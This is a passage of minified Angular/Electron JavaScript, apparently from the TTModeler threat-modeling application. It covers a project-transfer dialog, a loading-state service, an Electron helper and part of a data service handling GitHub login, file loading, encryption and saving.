_Oe(t,a){if(1&t&&(m(0,"mat-option",15),s(1,"\n        "),m(2,"mat-icon"),s(3),u(),s(4),u()),2&t){const e=a.$implicit,i=B();at("matTooltip",e.tooltip),V("value",e),C(3),ke(i.GetIcon(e)),C(1),ct("\n        ",e.name,"\n      ")}}function gOe(t,a){if(1&t){const e=Ye();m(0,"li"),s(1,"\n          "),m(2,"mat-checkbox",16),he("ngModelChange",function(n){return Me(be(e).$implicit.Key=n)})("ngModelChange",function(){return be(e),Me(B().UpdateAllDetails())}),s(3),oe(4,"translate"),u(),s(5,"\n        "),u()}if(2&t){const e=a.$implicit,i=B();C(2),V("disabled",!i.SourceProject||null==e.Key)("ngModel",e.Key),C(1),ct("\n            ",re(4,3,e.Value),"\n          ")}}let COe=(()=>{class t{constructor(e,i,n){this.dataService=e,this.messageService=i,this.translate=n,this.AvailableProjects=[],this.Details=[],this.AllDetails=!1,this.TransferLog=null}get SourceProject(){return this.sourceProject}set SourceProject(e){this.sourceProject=e,e&&(this.TransferLog=null)}ngOnInit(){this.dataService.AvailableProjects.forEach(e=>{var i;this.AvailableProjects.push({key:e,name:e.name,tooltip:e.source==hn.GitHub?(null===(i=this.dataService.GetRepoOfFile(e))||void 0===i?void 0:i.name)+"/"+e.path:e.path})}),this.Details.push({Key:!1,Value:"dialog.transferproject.d.Participants"}),this.Details.push({Key:!1,Value:"dialog.transferproject.d.CharScope"}),this.Details.push({Key:!1,Value:"dialog.transferproject.d.ObjImpact"}),this.Details.push({Key:!1,Value:"dialog.transferproject.d.Assets"}),this.Details.push({Key:!1,Value:"dialog.transferproject.d.ThreatSources"}),this.Details.push({Key:!1,Value:"dialog.transferproject.d.ThreatIdentification"}),this.Details.push({Key:!1,Value:"dialog.transferproject.d.Tags"}),this.Details.push({Key:!1,Value:"dialog.transferproject.d.ExportTemplates"})}LoadProject(){const e=i=>{var n;0==(null===(n=i.Participants)||void 0===n?void 0:n.length)&&(this.Details.find(r=>"dialog.transferproject.d.Participants"==r.Value).Key=null),(null==i.GetProjectAssetGroup()||null==this.SourceProject.GetProjectAssetGroup())&&(this.Details.find(r=>"dialog.transferproject.d.Assets"==r.Value).Key=null),0==i.GetThreatSources().Sources.length&&(this.Details.find(r=>"dialog.transferproject.d.ThreatSources"==r.Value).Key=null),0==i.GetSystemThreats().length&&(this.Details.find(r=>"dialog.transferproject.d.ThreatIdentification"==r.Value).Key=null)};this.Details.forEach(i=>i.Key=!1),this.dataService.GetFile(this.SelectedProject.key).then(i=>{this.SourceProject=i,e(this.SourceProject)}).catch()}TransferProject(){this.TransferLog=this.sourceProject.Name+":\n",this.TransferLog+=this.translate.instant("dialog.transferproject.l.start")+"\n";const e=this.dataService.Project,i=this.SourceProject;this.Details.filter(n=>1==n.Key).forEach(n=>{if("dialog.transferproject.d.Participants"===n.Value)i.Participants.forEach(r=>{e.Participants.some(c=>c.Name==r.Name&&c.Email==r.Email)||(e.Participants.push({Name:r.Name,Email:r.Email}),this.TransferLog+=this.translate.instant("dialog.transferproject.l.createParticipant")+": "+r.Name+"\n")});else if("dialog.transferproject.d.CharScope"===n.Value){const r=i.GetCharScope(),c=e.GetCharScope();r.StepProperties.forEach(d=>{r[d].forEach(T=>c[d].push(T)),r[d].length>0&&(this.TransferLog+="Update: "+this.translate.instant("pages.modeling.charscope."+d)+"\n")})}else if("dialog.transferproject.d.ObjImpact"===n.Value){const r=i.GetObjImpact(),c=e.GetObjImpact();r.StepProperties.forEach(d=>{r[d].forEach(T=>c[d].push(T)),r[d].length>0&&(this.TransferLog+="Update: "+this.translate.instant("pages.modeling.objimpact."+d)+"\n")})}else if("dialog.transferproject.d.Assets"===n.Value){const r=i.GetProjectAssetGroup(),c=e.GetProjectAssetGroup();if(r&&c){const d=(q,Y)=>{const te=e.CreateMyData(Y);te.CopyFrom(q.Data),this.TransferLog+=this.translate.instant("dialog.transferproject.l.createMyData")+": "+te.Name+"\n"},T=(q,Y)=>{const te=e.CreateAssetGroup(Y);te.CopyFrom(q.Data),te.Data.assetGroupIDs=[],te.Data.associatedDataIDs=[],this.TransferLog+=this.translate.instant("dialog.transferproject.l.createAsset")+": "+te.Name+"\n",q.AssociatedData.forEach(pe=>d(pe,te)),q.SubGroups.forEach(pe=>T(pe,te))},k=(q,Y)=>{q.SubGroups.forEach(te=>{Y.SubGroups.some(pe=>pe.Name===te.Name)||T(te,Y)}),q.AssociatedData.forEach(te=>{Y.AssociatedData.some(pe=>pe.Name==te.Name)||d(te,Y)}),q.SubGroups.forEach(te=>{k(te,Y.SubGroups.find(pe=>pe.Name==te.Name))})};k(r,c)}}else if("dialog.transferproject.d.ThreatSources"===n.Value){const r=i.GetThreatSources(),c=e.GetThreatSources();r.Sources.forEach(d=>{if(!c.Sources.some(T=>T.Name==d.Name)){const T=e.CreateThreatActor();T.CopyFrom(d.Data),c.AddThreatActor(T),this.TransferLog+=this.translate.instant("dialog.transferproject.l.createThreatActor")+": "+T.Name+"\n"}})}else if("dialog.transferproject.d.ThreatIdentification"===n.Value){const r=e.GetSystemThreats();i.GetSystemThreats().forEach(c=>{if(!r.some(d=>d.Name==c.Name)){let d=this.dataService.Config.GetThreatCategory(c.ThreatCategory.ID);d||(d=this.dataService.Config.GetThreatCategories().find(Y=>Y.Name==c.ThreatCategory.Name)),d||(d=this.dataService.Config.GetThreatCategories()[0]);const T=e.CreateSystemThreat(d);T.CopyFrom(c.Data),T.ThreatCategory=d,T.Data.affectedAssetObjectIDs=[];const k=e.GetAssetGroups(),q=e.GetMyDatas();c.AffectedAssetObjects.forEach(Y=>{let te=k.find(pe=>Y.Name==pe.Name);te||(te=q.find(pe=>Y.Name==pe.Name)),te&&(T.AffectedAssetObjects=[...T.AffectedAssetObjects,te])}),this.TransferLog+=this.translate.instant("dialog.transferproject.l.createSystemThreat")+": "+T.Name+"\n"}})}else"dialog.transferproject.d.Tags"===n.Value?i.GetMyTags().forEach(r=>{if(!e.GetMyTags().some(c=>c.Name==r.Name)){const c=e.CreateMyTag();c.CopyFrom(r.Data),this.TransferLog+=this.translate.instant("dialog.transferproject.l.createTag")+": "+c.Name+"\n"}}):"dialog.transferproject.d.ExportTemplates"===n.Value&&i.GetExportTemplates().forEach(r=>{if(!e.GetExportTemplates().some(c=>c.Name==r.Name)){const c=e.CreateExportTemplate();c.CopyFrom(r.Data),this.TransferLog+=this.translate.instant("dialog.transferproject.l.createExportTemplate")+": "+c.Name+"\n"}})}),this.Details.forEach(n=>n.Key=!1),this.UpdateAllDetails(),this.SelectedProject=null,this.SourceProject=null,this.TransferLog+=this.translate.instant("dialog.transferproject.l.finished")+"\n",this.dataService.ConsistencyCheck().then(n=>{n?this.messageService.Success("messages.success.transferedProjectDetails"):this.messageService.Warning("messages.warning.transferedProjectDetails")})}UpdateAllDetails(){this.AllDetails=this.Details.filter(e=>null!=e.Key).every(e=>e.Key)}SomeDetails(){return this.Details.filter(e=>e.Key).length>0&&!this.AllDetails}SetAll(e){this.AllDetails=e,this.Details.filter(i=>null!=i.Key).forEach(i=>i.Key=e)}GetIcon(e){return e.key.source==hn.FileSystem?"file_present":"cloud_queue"}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi),Ee(A2),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-transfer-project-dialog"]],decls:75,vars:36,consts:[["mat-dialog-title",""],["appearance","fill",2,"width","500px"],[3,"value","valueChange","selectionChange"],["style","vertical-align: bottom;",4,"ngIf"],["matTooltipShowDelay","1000",3,"value","matTooltip",4,"ngFor","ngForOf"],["mat-raised-button","",3,"disabled","click"],["mat-raised-button","","color","primary","matTooltipShowDelay","1000",2,"margin-left","50px",3,"disabled","matTooltip","click"],[2,"margin-top","20px"],[1,"detail-list-section"],["color","primary",1,"detail-margin",3,"disabled","checked","indeterminate","change"],[4,"ngFor","ngForOf"],["matInput","","readonly","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"disabled","ngModel","ngModelChange"],["align","end"],["mat-button","","mat-dialog-close",""],[2,"vertical-align","bottom"],["matTooltipShowDelay","1000",3,"value","matTooltip"],["color","primary",3,"disabled","ngModel","ngModelChange"]],template:function(e,i){1&e&&(m(0,"h2",0),s(1),oe(2,"translate"),u(),s(3,"\n"),m(4,"mat-dialog-content"),s(5,"\n  "),m(6,"mat-form-field",1),s(7,"\n    "),m(8,"mat-label"),s(9),oe(10,"translate"),u(),s(11,"\n    "),m(12,"mat-select",2),he("valueChange",function(r){return i.SelectedProject=r})("selectionChange",function(){return i.SourceProject=null}),s(13,"\n      "),m(14,"mat-select-trigger"),s(15,"\n        "),ne(16,pOe,2,1,"mat-icon",3),s(17),u(),s(18,"\n      "),m(19,"mat-option"),s(20),oe(21,"translate"),u(),s(22,"\n      "),ne(23,_Oe,5,4,"mat-option",4),s(24,"\n    "),u(),s(25,"\n  "),u(),s(26,"\n  "),it(27,"br"),s(28,"\n  "),m(29,"button",5),he("click",function(){return i.LoadProject()}),s(30),oe(31,"translate"),u(),s(32,"\n  "),m(33,"button",6),he("click",function(){return i.TransferProject()}),oe(34,"translate"),s(35),oe(36,"translate"),u(),s(37,"\n  "),it(38,"br"),s(39,"\n  "),m(40,"div",7),s(41,"\n    "),m(42,"span",8),s(43,"\n      "),m(44,"mat-checkbox",9),he("change",function(r){return i.SetAll(r.checked)}),s(45),oe(46,"translate"),u(),s(47,"\n    "),u(),s(48,"\n    "),m(49,"span",8),s(50,"\n      "),m(51,"ul"),s(52,"\n        "),ne(53,gOe,6,5,"li",10),s(54,"\n      "),u(),s(55,"\n    "),u(),s(56,"\n  "),u(),s(57,"\n  "),it(58,"br"),s(59,"\n  "),m(60,"mat-form-field",1),s(61,"\n    "),m(62,"mat-label"),s(63,"Log"),u(),s(64,"\n    "),m(65,"textarea",11),he("ngModelChange",function(r){return i.TransferLog=r}),u(),s(66,"\n  "),u(),s(67,"\n"),u(),s(68,"\n"),m(69,"mat-dialog-actions",12),s(70,"\n  "),m(71,"button",13),s(72),oe(73,"translate"),u(),s(74,"\n"),u()),2&e&&(C(1),ke(re(2,20,"dialog.transferproject.title")),C(8),ke(re(10,22,"dialog.transferproject.SelectSourceProject")),C(3),V("value",i.SelectedProject),C(4),V("ngIf",i.SelectedProject),C(1),ct("\xa0",null==i.SelectedProject?null:i.SelectedProject.name,"\n      "),C(3),ke(re(21,24,"properties.selectNone")),C(3),V("ngForOf",i.AvailableProjects),C(6),V("disabled",!i.SelectedProject),C(1),ke(re(31,26,"dialog.transferproject.LoadProject")),C(3),at("matTooltip",re(34,28,"dialog.transferproject.TransferDetails.tt")),V("disabled",!i.SourceProject||!i.SomeDetails()&&!i.AllDetails),C(2),ke(re(36,30,"dialog.transferproject.TransferDetails")),C(9),V("disabled",!i.SourceProject)("checked",i.AllDetails)("indeterminate",i.SomeDetails()),C(1),ct("\n        ",re(46,32,"dialog.transferproject.Details"),"\n      "),C(8),V("ngForOf",i.Details),C(12),V("disabled",!i.TransferLog)("ngModel",i.TransferLog),C(7),ke(re(73,34,"general.Close")))},dependencies:[Zi,Ri,an,Ta,Ea,oa,br,da,nn,un,Nr,Qge,yr,Go,Xa,Pa,vm,Am,Tm,Em,Xi],styles:[".detail-section[_ngcontent-%COMP%]{margin:12px 0}.detail-margin[_ngcontent-%COMP%]{margin:0 12px}ul[_ngcontent-%COMP%]{list-style-type:none;margin-top:4px}"]}),t})();class yOe{constructor(a=!0,e=!0,i){this.value=a,this.source=e,this.unique=i}isSame(a=!0,e){return!!(a===this.source||a===this.value||this.unique&&e&&this.unique===e)}}let $G=(()=>{class t{constructor(){this.defaultKey="default",this.loadingSubjects=new Map,this.loadingStacks=new Map,this.loadingKeyIndex=new Map}isLoading$(e={}){if(Array.isArray(e.key)){if(0===e.key.length)throw new Error("Must provide at least one key when passing an array of keys");return ug(e.key.map(n=>this.isLoading$({key:n}))).pipe(Xe(n=>n.some(r=>r)),Bh())}const i=this.normalizeKeys(e.key);return new G(n=>{this.indexKeys(i);const r=this.loadingSubjects.get(i[0]).pipe(Bh()).subscribe(n);return()=>{r.unsubscribe(),i.forEach(c=>this.deIndexKey(c))}})}isLoading(e={}){return this.normalizeKeys(e.key).map(n=>{var r,c;return null!==(c=null===(r=this.loadingSubjects.get(n))||void 0===r?void 0:r.value)&&void 0!==c&&c}).some(n=>n)}add(e,i){const n=i||!(e instanceof Promise||e instanceof I||e instanceof G)&&e||void 0;let r,c;const d=k=>()=>this.remove(k,n),T=this.normalizeKeys(null==n?void 0:n.key);if(e instanceof I||e instanceof G){if(c=e,r=T.map(e instanceof G?()=>e.pipe(Cn(1)).subscribe():()=>e),r[0].closed)return e;r.forEach(k=>k.add(d(k)))}else e instanceof Promise&&(c=e,r=T.map(()=>e),r.forEach(k=>k.then(d(e),d(e))));return this.indexKeys(T),T.forEach((k,q)=>{const Y=r&&r[q],te=this.loadingStacks.get(k);if(null!=n&&n.unique){const pe=te.findIndex(Re=>Re.isSame(Y,null==n?void 0:n.unique));if(pe>=0){const Re=te.splice(pe,1)[0];Re.source instanceof G&&Re.value.unsubscribe()}}te.push(new yOe(Y,e instanceof G?e:Y,null==n?void 0:n.unique)),this.updateLoadingStatus(k)}),c}remove(e,i){let r,n=i;e instanceof I||e instanceof Promise||e instanceof G?r=e:n=e;const c=this.normalizeKeys(null==n?void 0:n.key);for(const d of c){const T=this.loadingStacks.get(d);if(!T)continue;const k=T.findIndex(Y=>Y.isSame(r));if(k<0)continue;const q=T.splice(k,1)[0];r instanceof G&&q.source===r&&q.value.unsubscribe(),this.updateLoadingStatus(d),this.deIndexKey(d)}}clear(e){const i=null!=e&&e.key?this.normalizeKeys(e.key):Array.from(this.loadingStacks.keys());for(const n of i){const r=this.loadingStacks.get(n);if(r){for(const c of r)c.source instanceof G&&c.value.unsubscribe(),this.deIndexKey(n);this.loadingStacks.has(n)&&this.loadingStacks.set(n,[]),this.updateLoadingStatus(n)}}}normalizeKeys(e){return e?Array.isArray(e)||(e=[e]):e=[this.defaultKey],e}indexKeys(e){for(const i of e)if(this.loadingKeyIndex.has(i)){const n=this.loadingKeyIndex.get(i);this.loadingKeyIndex.set(i,n+1)}else{const n=new zs(!1);this.loadingKeyIndex.set(i,1),this.loadingSubjects.set(i,n),this.loadingStacks.set(i,[])}}deIndexKey(e){const i=this.loadingKeyIndex.get(e);1===i?(this.loadingKeyIndex.delete(e),this.loadingSubjects.delete(e),this.loadingStacks.delete(e)):this.loadingKeyIndex.set(e,i-1)}updateLoadingStatus(e){var i,n,r;const d=(null!==(n=null===(i=this.loadingStacks.get(e))||void 0===i?void 0:i.length)&&void 0!==n?n:0)>0;null===(r=this.loadingSubjects.get(e))||void 0===r||r.next(d)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();new ni("SW_IS_LOADING_DIRECTIVE_CONFIG");let ST=(()=>{class t{constructor(){this.isElectron&&(this.ipcRenderer=window.require("electron").ipcRenderer,this.webFrame=window.require("electron").webFrame,this.fs=window.require("fs"),this.childProcess=window.require("child_process"),this.childProcess.exec("node -v",(e,i,n)=>{e?console.error(`error: ${e.message}`):n?console.error(`stderr: ${n}`):console.log(`stdout:\n${i}`)}))}get isElectron(){return!!(window&&window.process&&window.process.type)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();var O5=de(5449).Buffer,Es=(()=>{return(t=Es||(Es={}))[t.Project=1]="Project",t[t.Config=2]="Config",Es;var t})(),hn=(()=>{return(t=hn||(hn={}))[t.Import=1]="Import",t[t.FileSystem=2]="FileSystem",t[t.GitHub=3]="GitHub",hn;var t})(),Wr=(()=>{return(t=Wr||(Wr={}))[t.None=0]="None",t[t.Guest=1]="Guest",t[t.LoggedIn=2]="LoggedIn",Wr;var t})();let Yi=(()=>{class t{constructor(e,i,n,r,c,d,T,k,q,Y,te){if(this.locStorage=e,this.isLoading=i,this.http=n,this.router=r,this.clipboard=c,this.dialog=d,this.messagesService=T,this.translate=k,this.fileUpdate=q,this.zone=Y,this.electron=te,this.hasSpellCheck=null,this.userMode=Wr.None,this.repos=[],this.availableFiles=[],this.NewVersionAvailable=null,this.ProjectChanged=new Tt,this.ProjectSaved=new Tt,this.ConfigChanged=new Tt,this.isLoggingIn=!1,this.blockLoading=!1,this.checkAppVersionUpdate(),this.restoreUserAccount(),this.UserMode==Wr.None&&"true"==this.locStorage.Get(si.AUTH_GUEST)&&(this.userMode=Wr.Guest),(this.UserMode==Wr.LoggedIn||this.UserMode==Wr.Guest)&&this.retrieveRepositories(),this.Config=Wu.DefaultFile(),setTimeout(()=>{(new Sl).repos.listReleases({owner:"SecSimon",repo:"TTM"}).then(({data:Re})=>{const Fe=Re.find(Ne=>this.isNewVersion(Ne.tag_name,hf_i));Fe&&(this.messagesService.Info(Gi.Format(this.translate.instant("messages.info.newVersion"),Fe.tag_name)),setTimeout(()=>{this.NewVersionAvailable=Fe.tag_name},1500))})},12e3),this.electron.isElectron&&this.electron.ipcRenderer){this.electron.ipcRenderer.on("oncode",(Re,Fe)=>{this.zone.run(()=>this.LogIn(Fe))}),this.electron.ipcRenderer.on("OnNew",()=>{this.zone.run(()=>this.OnNewProject())}),this.electron.ipcRenderer.on("OnSave",()=>{this.zone.run(()=>this.OnSave())}),this.electron.ipcRenderer.on("OnSaveAs",()=>{this.zone.run(()=>this.OnSave(!0))}),this.electron.ipcRenderer.on("OnLocalDownload",()=>{this.zone.run(()=>this.OnSave(null,!0))}),this.electron.ipcRenderer.on("OnCloseFile",()=>{this.zone.run(()=>this.OnCloseFile())}),this.electron.ipcRenderer.on("OnOpenFile",(Re,Fe,Ne)=>{this.zone.run(()=>{this.IsLoggedIn||this.GuestLogin(),this.OnCloseFile().then(()=>{const et=JSON.parse(Fe);this.locStorage.Remove(si.LAST_FILE),this.OnLoadFile({source:hn.FileSystem,importData:et,path:Ne,name:this.GetFileName(Ne),isEncrypted:null,type:null})})})}),this.electron.ipcRenderer.send("RendererReady");const pe=this.getLastFileHistory().filter(Re=>Re.source==hn.FileSystem);pe.length>0&&this.electron.ipcRenderer.send("ExistFiles",pe.map(Re=>Re.path)),this.electron.ipcRenderer.on("ExistFilesCallback",(Re,Fe)=>{this.zone.run(()=>{Fe.forEach(et=>this.addFileToAvailableFiles(pe.find(ut=>ut.path==et&&ut.source==hn.FileSystem)));const Ne=this.locStorage.Get(si.LAST_FILE);if(Ne){const et=JSON.parse(Ne);if(et.source==hn.FileSystem){const ut=this.AvailableFiles.find(Ze=>Ze.source==hn.FileSystem&&Ze.path==et.path);ut&&(this.IsLoggedIn||this.GuestLogin(),this.messagesService.Info(Gi.Format(this.translate.instant("messages.info.loadFile"),ut.name)),this.OnLoadFile(ut))}}})})}}get selectedFile(){return this._selectedFile}set selectedFile(e){this._selectedFile=e,e&&this.addFileToHistory(e)}get UserMode(){return this.userMode}get IsLoggedIn(){return this.UserMode==Wr.LoggedIn}get IsGuest(){return this.UserMode==Wr.Guest}get KeepUserSignedIn(){let e=this.locStorage.Get(si.AUTH_KEEP_SIGNED_IN);return null==e?(this.locStorage.Set(si.AUTH_KEEP_SIGNED_IN,String(!0)),!0):"true"==e}set KeepUserSignedIn(e){this.locStorage.Set(si.AUTH_KEEP_SIGNED_IN,String(e))}get UserName(){return this.userName}get UserAccount(){return this.userAccount}get UserURL(){return this.userURL}get UserEmail(){return this.userEmail}get UserDisplayName(){return Gi.NullOrEmpty(this.UserName)?this.UserAccount:this.UserName}get Repos(){return this.repos}get SelectedFile(){return this.selectedFile}get SelectedGHFile(){var e;return(null===(e=this.selectedFile)||void 0===e?void 0:e.source)==hn.GitHub?this.SelectedFile:null}get SelectedFSFile(){var e;return(null===(e=this.selectedFile)||void 0===e?void 0:e.source)==hn.GitHub?this.SelectedFile:null}get AvailableFiles(){return this.availableFiles}get AvailableProjects(){return this.availableFiles.filter(e=>e.type==Es.Project)}get AvailableConfigs(){return this.availableFiles.filter(e=>e.type==Es.Config)}get AvailableFSProjects(){return this.availableFiles.filter(e=>e.source==hn.FileSystem&&e.type==Es.Project)}get AvailableFSConfigs(){return this.availableFiles.filter(e=>e.source==hn.FileSystem&&e.type==Es.Config)}get AvailableGHProjects(){return this.availableFiles.filter(e=>e.source==hn.GitHub&&e.type==Es.Project)}get AvailableGHConfigs(){return this.availableFiles.filter(e=>e.source==hn.GitHub&&e.type==Es.Config)}get HasProject(){return null!=this.Project}get Project(){return this.project}set Project(e){this.project!=e&&(e&&e.TTModelerVersion&&this.isNewVersion(e.TTModelerVersion,hf_i)&&(this.messagesService.Error(Gi.Format(this.translate.instant("messages.error.newerFileVersion"),e.TTModelerVersion)),e=null),this.project=e,e?(this.project.FileChanged=!1,e.TTModelerVersion=hf_i,this.Config=e.Config,this.Config.ProjectFile=e,this.project.DataChanged.subscribe(()=>{this.startUnsavedChangesTimer()})):this.stopUnsavedChangesTimer(),this.ProjectChanged.emit(e))}get Config(){return this.config}set Config(e){this.config=e,this.ConfigChanged.emit(e)}get CanSaveFile(){var e;return(null===(e=this.SelectedFile)||void 0===e?void 0:e.source)!=hn.GitHub||this.GetRepoOfFile(this.SelectedFile).isWritable}get CanSaveProject(){return this.CanSaveFile&&null!=this.Project}get HasUnsavedChanges(){var e;return this.Project?this.Project.FileChanged:null===(e=this.Config)||void 0===e?void 0:e.FileChanged}get HasSpellCheck(){if(null==this.hasSpellCheck){const e=this.locStorage.Get(si.SPELL_CHECK);this.hasSpellCheck="true"==e||null==e}return this.hasSpellCheck}set HasSpellCheck(e){this.hasSpellCheck=e,this.locStorage.Set(si.SPELL_CHECK,String(e))}LogIn(e){if(!this.isLoggingIn&&this.locStorage.Get(si.AUTH_LAST_CODE)!=e)try{this.isLoggingIn=!0,this.isLoading.add(),this.clearLoginData();const i={headers:new du({"Content-Type":"text/plain"}),responseType:"text"};this.http.post("https://1tvzjyylrh.execute-api.us-east-2.amazonaws.com/default/GithubAuthHandler",JSON.stringify({code:e}),i).subscribe(n=>{n.includes("access_token")?(this.accessToken=n.split("&")[0].split("=")[1],this.userMode=Wr.LoggedIn,this.KeepUserSignedIn&&(this.locStorage.Set(si.AUTH_ACCESS_TOKEN,this.accessToken),this.locStorage.Set(si.AUTH_LAST_CODE,e)),this.messagesService.Success("messages.success.githubauth"),this.retrieveUser()):this.messagesService.Error("messages.error.githubauth",n),this.isLoading.remove(),this.isLoggingIn=!1},n=>{this.messagesService.Error("messages.error.githubauth",n),this.isLoading.remove(),this.isLoggingIn=!1})}catch(i){this.messagesService.Error("messages.error.githubauth",i),this.isLoading.remove(),this.isLoggingIn=!1}}GuestLogin(){this.userMode=Wr.Guest,this.locStorage.Set(si.AUTH_GUEST,String(!0)),this.retrieveRepositories(),this.router.navigate(["/"])}LogOut(){this.OnCloseFile().then(()=>{this.clearLoginData(),this.AvailableFiles.forEach(e=>{e.source==hn.GitHub&&"SecSimon"!=this.GetRepoOfFile(e).owner&&this.removeFileFromAvailableFiles(e)}),this.messagesService.Info("messages.info.logout"),this.router.navigate(["/"])})}OnNewProject(e=null){this.isLoading.add(),this.OnCloseFile().then(()=>{this.selectedFile=null;const i=n=>{n.Data.ID=Fo();const r=new uf({},n);r.InitializeNewProject(),r.CreateDiagram(xn.DataFlow),r.Name="Project.ttmp",this.selectedFile={source:hn.Import,type:Es.Project,name:r.Name,isEncrypted:null,path:null},this.Project=r,this.locStorage.Remove(si.LAST_FILE),this.isLoading.remove()};e?this.GetFile(e).then(n=>i(n)).catch(n=>this.messagesService.Error(n)):i(Wu.DefaultFile())})}OnLoadFile(e){const i=this.locStorage.Get(si.LAST_FILE);this.OnCloseFile().then(()=>{if(e.source==hn.GitHub&&i){const n=JSON.parse(i);if(this.compareFiles(e,n)&&e.sha!=n.sha)return this.isLoading.remove(),void this.messagesService.Error("messages.error.githuboutdatedfile")}this.selectedFile=e,this.GetFile(e).then(n=>{n instanceof uf?(this.Project=n,this.messagesService.Success("messages.success.loadProject",e.name)):n&&(this.Config=n,this.Project=null,this.messagesService.Success("messages.success.loadConfig",e.name))}).catch(n=>{this.messagesService.Error(n)})})}ImportFile(e){if(e.target.files&&e.target.files[0]){const i=new FileReader,n=this.electron.isElectron?e.target.files[0].path:e.target.files[0].name;i.onload=r=>{const d=JSON.parse(i.result.toString());this.OnLoadFile({path:n,name:this.GetFileName(n),source:hn.Import,type:null,isEncrypted:null,importData:d})},i.readAsText(e.target.files[0])}}GetFile(e){return new Promise((i,n)=>{this.isLoading.add();const r=(c,d)=>{const T=(k,q)=>{if("content"in k){const te=JSON.parse(k.content);d.type=null!=te.config?Es.Project:Es.Config,d.type==Es.Project?(this.fileUpdate.UpdateProjectFile(te),te.Data.Name=d.name,i(uf.FromJSON(te))):(this.fileUpdate.UpdateConfigFile(te),te.Data.Name=d.name,i(Wu.FromJSON(te)))}else n("Unsupported file")};if("encrypted"in c){const k=(q,Y)=>{const te={pw:"",file:d.name};this.isLoading.add(),this.dialog.open(mwe,{hasBackdrop:!1,data:te}).afterClosed().subscribe(Re=>{if(Re)try{this.fileContentCrypto=new y5(te.pw),this.fileContentCrypto.Decrypt(q.encrypted),q.content=JSON.parse(this.fileContentCrypto.Decrypt(q.content)),delete q.encrypted,T(q)}catch(Fe){this.messagesService.Warning("messages.warning.wrongPassword"),k(q,Y)}finally{this.isLoading.remove()}else this.isLoading.remove()})};d.isEncrypted=!0,k(c,d)}else T(c)};if(e.importData){const c=e.importData;e.importData=null,r(c,e),this.isLoading.remove()}else e.source==hn.GitHub?(this.UserMode==Wr.LoggedIn?new Sl({auth:this.accessToken}):new Sl).git.getBlob({owner:this.GetRepoOfFile(e).owner,repo:this.GetRepoOfFile(e).name,file_sha:e.sha}).then(({data:d})=>{const T=JSON.parse(O5.from(d.content,"base64").toString());r(T,e)}).catch(d=>{this.messagesService.Error("messages.error.githubfetch",d)}).finally(()=>{this.isLoading.remove()}):e.source==hn.FileSystem&&(0==this.electron.ipcRenderer.listenerCount("ReadFileCallback")&&this.electron.ipcRenderer.on("ReadFileCallback",(c,d,T)=>{this.zone.run(()=>{try{const k=JSON.parse(d);r(k,e)}catch(k){console.log(k)}finally{this.isLoading.remove()}}),this.electron.ipcRenderer.removeAllListeners("ReadFileCallback")}),this.electron.ipcRenderer.send("ReadFile",e.path))})}ReloadFile(){if(this.SelectedFile){const e=this.SelectedFile;this.OnCloseFile().then(()=>{this.OnLoadFile(e)})}}RestoreCommit(e){const i=this.UserMode==Wr.LoggedIn?new Sl({auth:this.accessToken}):new Sl,n=this.SelectedFile;i.repos.getCommit({owner:this.GetRepoOfFile(n).owner,repo:this.GetRepoOfFile(n).name,ref:e.sha}).then(({data:r})=>{var c;if(1==(null===(c=r.files)||void 0===c?void 0:c.length)&&r.files[0].filename==this.SelectedFile.path){const d=JSON.parse(JSON.stringify(this.SelectedFile));d.sha=r.files[0].sha,this.OnLoadFile(d)}})}OnSave(e=!1,i=!1,n=!1){return new Promise((r,c)=>{this.ConsistencyCheck().then(d=>{var T,k;const q=(pe,Re)=>{const Fe=new Blob([Re],{type:"text/plain;charset=utf-8"}),Ne=new Date,et=pe.split("."),ut=[Ne.getFullYear(),Ne.getMonth()+1,Ne.getDate()],Ze=[Ne.getHours(),Ne.getMinutes(),Ne.getSeconds()],yt=(It,St=2)=>{let Nt=It.toString();for(;Nt.length<St;)Nt="0"+Nt;return Nt};et.splice(1,0,"_",...ut.map(It=>yt(It)),"_",...Ze.map(It=>yt(It)),"."),(0,yM.saveAs)(Fe,et.join("")),r()},Y=(pe,Re,Fe,Ne,et,ut,Ze,yt,It=null)=>{this.isLoading.add();const St=this.getFileContent(Ze,yt,It);return new Sl({auth:this.accessToken}).rest.repos.createOrUpdateFileContents({owner:Re,repo:Fe,path:Ne,message:0==et.length?"Update":et,content:O5.from(St).toString("base64"),sha:ut,committer:{name:this.UserAccount,email:this.UserEmail}}).then(({data:oi})=>{pe(oi)}).catch(oi=>{409==oi.status&&oi.message.includes("does not match")?this.messagesService.Error("messages.error.githubSHAmismatch"):this.messagesService.Error("messages.error.githubpush",oi)}).finally(()=>this.isLoading.remove())},te=!(null===(T=this.SelectedFile)||void 0===T||!T.isEncrypted);if(n&&i){this.isLoading.add();let pe=this.Config.Name;this.Project&&(pe=this.Project.Name.replace(".ttmp",".ttmc")),pe.endsWith(".ttmc")||(pe+=".ttmc"),q(pe,this.getFileContent(this.Config.ToJSON(),te)),this.isLoading.remove()}else{const pe=(null===(k=this.SelectedFile)||void 0===k?void 0:k.type)!=Es.Project||n?this.Config:this.Project;let Re="";if(n?Re=this.SelectedFile.name.replace(".ttmp",".ttmc"):this.SelectedFile?Re=this.SelectedFile.name:this.Project?Re=this.Project.Name+(this.Project.Name.endsWith(".ttmp")?"":".ttmp"):this.Config&&(Re=this.Config.Name+(this.Config.Name.endsWith(".ttmc")?"":".ttmc")),pe.Name=Re,this.SelectedFile?this.SelectedFile.source!=hn.GitHub||this.GetRepoOfFile(this.SelectedFile).isWritable?this.SelectedFile.source!=hn.Import||this.IsLoggedIn?e&&this.SelectedFile.type==Es.Config&&this.IsLoggedIn&&(n=!0):i=!0:this.IsLoggedIn?e=!0:i=!0:i=!0,n)if(this.UserMode==Wr.LoggedIn){const Fe={msg:""};Fe.newConfig={source:hn.GitHub,type:Es.Config,name:"",path:"",repoId:null,isEncrypted:te,sha:null},te&&(Fe.removePW=!1),this.dialog.open(jG,{hasBackdrop:!1,data:Fe}).afterClosed().subscribe(et=>{if(et)if(null!=Fe.newConfig){const 